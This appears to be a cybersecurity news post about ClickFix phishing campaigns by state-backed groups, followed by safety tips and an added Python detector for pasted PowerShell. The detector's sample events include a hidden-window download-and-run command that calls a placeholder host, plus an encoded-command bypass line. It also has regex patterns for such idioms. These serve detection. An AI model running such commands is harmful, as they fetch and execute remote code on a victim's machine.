Hackers Use ClickFix to Convince Users to Install Malware

An increasing number of state-sponsored hacking groups from Russia, Iran, and North Korea are using ClickFix, a deceptive cyberattack technique that is quickly becoming more popular among advanced persistent threat (APT) actors because of its low technical visibility and high success rate.
ClickFix is a social engineering scam in which hackers trick victims into visiting malicious websites that imitate trustworthy document-sharing or software portals. Once on the site, users are shown phony error messages stating that a software or document download has failed. Victims are then asked to manually run a PowerShell or command-line script to “fix” the problem, unintentionally infecting their system with malware.
State-Sponsored Threat Actors’ Worldwide Adoption
According to a recent report by cybersecurity firm Proofpoint, ClickFix was widely used in espionage campaigns between late 2024 and early 2025. APT groups that used the tactic included Kimsuky (North Korea), MuddyWater (Iran), APT28, and a Russian-affiliated actor known as UNK_RemoteRogue.
- Kimsuky of North Korea: Used emails posing as Japanese diplomats to target think tanks involved in Korean policy. Phishing communications referred to fictitious secure drives, which led victims to register devices using PowerShell instructions and install QuasarRAT while presenting fictitious documents to allay suspicions.
- Iran’s MuddyWater: In mid-November 2024, Iran’s MuddyWater sent phishing emails to 39 Middle Eastern organizations while posing as Microsoft. Under the pretense of installing a crucial security patch, victims were duped into running a PowerShell script that installed “Level,” a remote monitoring tool used for data theft and surveillance.
- Russia’s UNK_RemoteRogue: In December 2024, this Russian-affiliated actor targeted companies connected to an arms factory. Victims were sent emails from hacked Zimbra servers that led them to bogus Microsoft Word pages with instructions, and even a YouTube lesson, which resulted in PowerShell execution linked to the Empire C2 framework.
- APT28 (Fancy Bear): In October 2024, ClickFix was exploited by another Russian threat actor associated with the GRU to disseminate phishing emails that imitated Google Spreadsheets and asked users to complete a reCAPTCHA fake. After the user executed the script, Metasploit was installed and an SSH tunnel was created, giving the attackers backdoor access to the device.
Why Does ClickFix Work?
ClickFix relies on user-initiated command execution, whereas conventional phishing depends on malicious file attachments. Because the victim manually enters the commands, believing they are fixing a technical problem, the technique bypasses many automated security filters.
According to experts, ClickFix’s effectiveness stems from users’ ignorance of the dangers of running unknown scripts, particularly ones with administrator capabilities.
Microsoft and Cybersecurity Experts Respond
The emergence of ClickFix in Kimsuky-run campaigns was previously noted by Microsoft’s Threat Intelligence team, which also emphasized the need for worldwide awareness. According to Proofpoint’s most recent investigation, ClickFix is increasingly being used for contemporary cyber espionage, particularly by attackers with adversarial state objectives.
How to Stay Safe
Security experts advise users to:
- Never execute commands from websites or emails unless they have been validated.
- Do not copy scripts from unidentified sources into PowerShell or command prompts.
- Look for indications of impersonation in email sources, domain names, and grammar.
- Inform the cybersecurity or IT departments about any questionable communications.
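As a defender-side illustration of the point above that the malicious command is typed by the user rather than delivered as an attachment, here is an added example (not from the article, Proofpoint, or Microsoft): a small Python check over constructed, simplified process-creation events that flags a shell launched from explorer.exe with hidden-window, encoded-command, or download-and-run indicators. The event format, the heuristics, and the sample command lines are assumptions made for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample events in a simplified Sysmon-like process-creation form:
# (parent image, child image, command line). These are not real logs.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     'powershell.exe -w hidden -c "iex (irm http://example.invalid/fix)"'),
    ("explorer.exe", "powershell.exe",
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc SQBFAFgAIAAo"),
    ("cmd.exe", "powershell.exe",
     "powershell.exe -File C:\\build\\scripts\\package.ps1"),
    ("explorer.exe", "notepad.exe", "notepad.exe notes.txt"),
]

# Assumed heuristics: flags that hide or obfuscate execution, and download-and-run idioms.
SUSPICIOUS_FLAGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-ep\s+bypass|-executionpolicy\s+bypass)")
DOWNLOAD_EXEC = re.compile(
    r"(?i)\b(iex|invoke-expression)\b.*\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b")
# A shell spawned by explorer.exe typically means the Run dialog or the File Explorer
# address bar, i.e. the user pasted the command rather than a script file being opened.
INTERACTIVE_PARENTS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

@dataclass
class Finding:
    reason: str
    cmdline: str

def score_event(parent, image, cmdline):
    """Return the reasons this event resembles user-pasted ClickFix execution."""
    reasons = []
    if image.lower() not in SHELLS:
        return reasons
    if parent.lower() in INTERACTIVE_PARENTS:
        reasons.append("shell launched from explorer.exe (Run dialog / address bar)")
    if SUSPICIOUS_FLAGS.search(cmdline):
        reasons.append("hidden window / encoded command / bypass flags")
    if DOWNLOAD_EXEC.search(cmdline):
        reasons.append("download-and-execute idiom")
    return reasons

def detect(events):
    """Flag events with an interactive parent plus at least one command-line indicator."""
    findings = []
    for parent, image, cmdline in events:
        reasons = score_event(parent, image, cmdline)
        if parent.lower() in INTERACTIVE_PARENTS and len(reasons) >= 2:
            findings.append(Finding("; ".join(reasons), cmdline))
    return findings
```

Running `detect(SAMPLE_EVENTS)` flags the two explorer.exe-spawned PowerShell events and leaves the build script and notepad launches alone; in practice the same logic would be expressed as a SIEM rule over real process-creation telemetry.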
ClickFix stands out as a powerful reminder that human error remains one of the most exploited weaknesses in today’s digital threat landscape, even as state-backed cyberattacks evolve.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.